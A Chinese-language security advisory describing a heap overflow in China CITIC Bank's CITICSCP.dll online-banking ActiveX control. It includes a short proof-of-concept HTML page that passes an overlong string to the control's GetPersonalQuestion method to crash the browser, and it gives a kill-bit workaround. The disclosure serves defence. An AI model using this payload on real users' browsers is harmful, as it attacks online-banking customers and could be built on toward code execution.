影响版本:
中信银行 CITICSCP.dll
漏洞描述:
CITICSCP.dll是使用中信银行的网银时所需安装的ActiveX控件。 CITICSCP.dll文件向系统注册了一个名为IMidInterface的控件接口。该接口主要负责的是银行证书的相关工作,其中包含很多用来操作网上银行证书的函数,如ExportCertificate、ImportPKCS12Certificate等,这些函数中堆溢出漏洞。如果用户受骗访问了恶意网页并向有漏洞的函数传送了超长的字符串类型的参数变量,就可以触发这个溢出,导致安装了中信银行网银控件的系统上浏览器自动崩溃。
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
<object classid="clsid:4BFE8042-A780-452F-AF17-9A424BE31B02" name="evil" ></object> <script> var a=Array(1244)+"vvvv"+"dddd"+"cccc"+"nnnn"; evil.GetPersonalQuestion(a); </script>
安全建议:
临时解决方法:
* 对CLSID {4BFE8042-A780-452F-AF17-9A424BE31B02}设置kill-bit。
厂商补丁:
中信银行
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://bank.ecitic.com/
0 条评论。